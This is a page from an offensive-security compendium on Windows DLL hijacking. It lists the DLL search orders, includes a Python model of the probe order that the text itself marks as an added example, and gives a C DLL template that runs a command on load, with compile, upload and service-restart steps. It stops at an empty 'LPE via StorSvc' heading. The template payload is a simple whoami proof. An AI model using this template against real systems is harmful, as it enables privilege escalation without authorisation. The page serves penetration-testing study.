killchain-compendium/Exploits/Windows/DLL Hijacking.md


DLL Hijacking

Basics

Search Orders

  • SafeDllSearchMode enabled searches in the following order:
    • Directory the executable was loaded from
    • System directory (GetSystemDirectory)
    • 16-bit system directory
    • Windows directory (GetWindowsDirectory)
    • Current working directory
    • Directories listed in PATH
  • SafeDllSearchMode disabled searches in the following order:
    • Directory the executable was loaded from
    • Current working directory
    • System directory
    • 16-bit system directory
    • Windows directory
    • Directories listed in the PATH environment variable
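To make the difference between the two settings concrete, here is an added Python model of the loader's probe order (example code, not from the compendium). It resolves an unqualified DLL name against a constructed file set and lists which directories are probed before the copy that actually loads, i.e. the directories whose ACLs decide whether that DLL can be hijacked. The directory names, `legit.dll` and the file set are assumptions.

```python
import ntpath
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Probe order for each SafeDllSearchMode setting, as listed on this page:
# "app_dir" is the directory the executable was loaded from, "cur_dir" is
# the process's current working directory.
SAFE_ORDER = ("app_dir", "system", "system16", "windows", "cur_dir", "path")
UNSAFE_ORDER = ("app_dir", "cur_dir", "system", "system16", "windows", "path")


@dataclass
class SearchContext:
    app_dir: str
    cur_dir: str
    path: List[str] = field(default_factory=list)
    system: str = r"C:\Windows\System32"
    system16: str = r"C:\Windows\System"
    windows: str = r"C:\Windows"
    present: Set[str] = field(default_factory=set)  # constructed "file system"


def probe_order(ctx: SearchContext, safe_mode: bool) -> List[str]:
    """Directories in the order the loader would probe them."""
    dirs: List[str] = []
    for role in (SAFE_ORDER if safe_mode else UNSAFE_ORDER):
        dirs.extend(ctx.path if role == "path" else [getattr(ctx, role)])
    return dirs


def resolve_dll(ctx: SearchContext, name: str, safe_mode: bool) -> Optional[str]:
    """Full path the loader picks for an unqualified DLL name, or None."""
    present = {p.lower() for p in ctx.present}  # NTFS names are case-insensitive
    for d in probe_order(ctx, safe_mode):
        full = ntpath.join(d, name)
        if full.lower() in present:
            return full
    return None


def dirs_probed_before(ctx: SearchContext, name: str, safe_mode: bool) -> List[str]:
    """Directories checked before the copy that actually loads. If the DLL
    is found nowhere, every probed directory is a candidate."""
    hit = resolve_dll(ctx, name, safe_mode)
    order = probe_order(ctx, safe_mode)
    if hit is None:
        return order
    return order[:order.index(ntpath.dirname(hit))]
```

With `legit.dll` present both in System32 and in the current directory, the safe order loads the System32 copy while the legacy order loads the one in the current directory.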

Template

#include <windows.h>
#include <stdlib.h>   /* system() */

/* Entry point the loader calls when the DLL is mapped into a process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        /* Runs once, at load time, in the context of the hosting process. */
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
  • Compile with
    x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
  • Upload the DLL to the target
  • Restart the dllsvc service with
    sc stop dllsvc
    sc start dllsvc

LPE via StorSvc